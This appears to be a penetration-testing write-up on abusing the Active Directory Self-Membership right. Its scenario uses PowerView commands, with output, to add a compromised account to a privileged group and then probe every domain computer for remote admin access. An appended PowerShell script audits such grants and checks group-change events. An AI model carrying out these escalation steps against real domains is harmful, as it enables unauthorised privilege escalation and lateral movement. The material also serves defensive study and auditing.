Self Exploit

What is the Self Permission For?

The Self permission grants the right to perform validated writes, i.e. operations that are controlled by a validated write access right. The validated writes, with their schema GUIDs and the attributes they cover, are:
  • Self-Membership (bf9679c0-0de6-11d0-a285-00aa003049e2 / member attribute)
  • Validated-DNS-Host-Name (72e39547-7b18-11d1-adef-00c04fd8d5cd / dNSHostName attribute)
  • Validated-MS-DS-Additional-DNS-Host-Name (80863791-dbe9-4eb8-837e-7f0ab55d9ac7 / msDS-AdditionalDnsHostName attribute)
  • Validated-MS-DS-Behavior-Version (d31a8757-2447-4545-8081-3bb610cacbf2 / msDS-Behavior-Version attribute)
  • Validated-SPN (f3a64788-5306-11d1-a9c5-0000f80367c1 / servicePrincipalName attribute)

How can this be abused?

When the Self permission on a group object covers the Self-Membership validated write, an attacker holding that permission can add themselves as a member of the group. Note that this validated write only lets the holder add or remove their own account, not other principals.

Scenario:

You have managed to compromise an account belonging to mspdb, who is a member of the msp.local domain. Running BloodHound identified that there was no direct access from the mspdb account to anywhere else on the network. Issuing the following PowerView commands identified that mspdb had the Self permission over the ForestManagers group, which is a group in the internal.msp.local domain.

Get the SID of the mspdb account

Get-NetUser -Identity mspdb -Domain msp.local

logoncount : 144
badpasswordtime : 10/6/2020 5:03:46 AM
distinguishedname : CN=mspdb,CN=Users,DC=msp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : msp db
lastlogontimestamp : 1/9/2021 9:27:09 PM
userprincipalname : mspdb
name : mspdb
objectsid : S-1-5-21-2998733414-582960673-4099777928-1107
samaccountname : mspdb
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 1/10/2021 5:27:09 AM
instancetype : 4
usncreated : 63471
objectguid : 9158587d-8b16-4b38-a013-0bfd1f2a5aaf
sn : db
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=msp,DC=local
dscorepropagationdata : {5/30/2019 11:42:37 AM, 1/1/1601 12:00:00 AM}
serviceprincipalname : MSSQLSvc/msp-sqlreport.msp.local
givenname : msp
lastlogon : 1/10/2021 1:38:13 AM
badpwdcount : 0
cn : mspdb
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 5/30/2019 11:42:36 AM
primarygroupid : 513
pwdlastset : 5/30/2019 4:42:37 AM
usnchanged : 1338942

Query internal.msp.local for any ACEs that reference this user's SID

Get-ObjectAcl -Domain internal.msp.local | Where-Object {$_.SecurityIdentifier -eq 'S-1-5-21-2998733414-582960673-4099777928-1107'}

ObjectDN : CN=ForestManagers,CN=Users,DC=internal,DC=msp,DC=local
ObjectSID : S-1-5-21-2754435719-1041067879-922430489-1118
ActiveDirectoryRights : Self
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : bf9679c0-0de6-11d0-a285-00aa003049e2
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 56
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 8
SecurityIdentifier : S-1-5-21-2998733414-582960673-4099777928-1107
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
ObjectDN : CN=ForestManagers,CN=Users,DC=internal,DC=msp,DC=local
ObjectSID : S-1-5-21-2754435719-1041067879-922430489-1118
ActiveDirectoryRights : ReadProperty, GenericExecute
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131092
SecurityIdentifier : S-1-5-21-2998733414-582960673-4099777928-1107
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

From the above we can see that mspdb holds the Self right over the ForestManagers group, and the ObjectAceType of bf9679c0-0de6-11d0-a285-00aa003049e2 identifies it as the Self-Membership validated write. This means that the account can add itself to that group.

Add mspdb to the ForestManagers group

Add-DomainGroupMember -Identity 'ForestManagers' -Members 'msp\mspdb' -Domain internal.msp.local

That user can now access any machine in the internal.msp.local domain that grants access to members of the ForestManagers group.

Finding Local Admin Access

We can issue the following queries to see if we now have access to any machines in the internal.msp.local domain.

PS C:\Users\Public> $comps = Get-NetComputer -Domain internal.msp.local
PS C:\Users\Public> Invoke-Command -ScriptBlock {hostname} -ComputerName ($comps.dnshostname) -ErrorAction SilentlyContinue
internal-srv06

From the above we can see that our command executed successfully on the machine internal-srv06, indicating that we have admin access there. We should now be able to PS-Remote into that machine.
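The Self ACE on ForestManagers above is exactly the kind of grant a defender should be hunting for before an attacker finds it. The following script is an added example, not part of the original write-up or of PowerView: it uses the RSAT ActiveDirectory module to list every group whose security descriptor grants the Self right for the Self-Membership validated write (or for all validated writes) to a principal outside an expected list, and then shows how membership changes to such a group surface in the Security log. The $ExpectedPrincipals list, the Find-SelfMembershipGrants and Get-GroupMembershipChanges names, and the domain controller name are assumptions to adjust for your environment.

```powershell
# Added audit example (not from the original page). Requires the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

# Validated-write GUIDs as listed at the top of the page.
$SelfMembershipGuid = [guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'
$AllObjectsGuid     = [guid]'00000000-0000-0000-0000-000000000000'   # ACE covers every validated write

# Principals that are expected to hold Self on groups; anything else is reported (assumption: tune per environment).
$ExpectedPrincipals = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF')

function Find-SelfMembershipGrants {
    param(
        [Parameter(Mandatory)] [string]   $Domain,              # e.g. internal.msp.local
        [string[]]                        $Expected = $ExpectedPrincipals
    )
    # One query pulls every group together with its security descriptor.
    $groups = Get-ADGroup -Filter * -Server $Domain -Properties nTSecurityDescriptor
    foreach ($group in $groups) {
        foreach ($ace in $group.nTSecurityDescriptor.Access) {
            # Only Allow ACEs carrying the Self bit (access mask 0x8, the value seen as AccessMask : 8 above).
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if (([int]$ace.ActiveDirectoryRights -band 0x8) -eq 0) { continue }
            # A Self ACE is a membership grant if it names Self-Membership or is not scoped to any attribute.
            if ($ace.ObjectType -ne $SelfMembershipGuid -and $ace.ObjectType -ne $AllObjectsGuid) { continue }
            # Foreign-domain SIDs that cannot be translated are reported as raw SIDs, which is what the ACL above showed.
            if ($Expected -contains $ace.IdentityReference.Value) { continue }
            [pscustomobject]@{
                Group      = $group.DistinguishedName
                Principal  = $ace.IdentityReference.Value
                Rights     = $ace.ActiveDirectoryRights
                ObjectType = $ace.ObjectType
                Inherited  = $ace.IsInherited
            }
        }
    }
}

# Detection side: adding a member to a group is logged on the DC that made the change as
# 4728 (security-enabled global), 4732 (domain local) or 4756 (universal group).
function Get-GroupMembershipChanges {
    param([Parameter(Mandatory)] [string] $GroupName, [Parameter(Mandatory)] [string] $DomainController)
    Get-WinEvent -ComputerName $DomainController -FilterHashtable @{ LogName = 'Security'; Id = 4728, 4732, 4756 } |
        Where-Object { $_.Message -like "*Group Name:*$GroupName*" } |
        Select-Object TimeCreated, Id, Message
}

# Usage: list unexpected Self-Membership grants in the domain that holds ForestManagers,
# then review who has been added to that group. 'dc01.internal.msp.local' is a placeholder.
Find-SelfMembershipGrants -Domain internal.msp.local | Format-Table -AutoSize
Get-GroupMembershipChanges -GroupName 'ForestManagers' -DomainController 'dc01.internal.msp.local'
```

Any row returned by Find-SelfMembershipGrants for a principal that does not administer the group is a candidate for ACE removal, and the 4728/4732/4756 events give the account and time of each change so the membership can be rolled back.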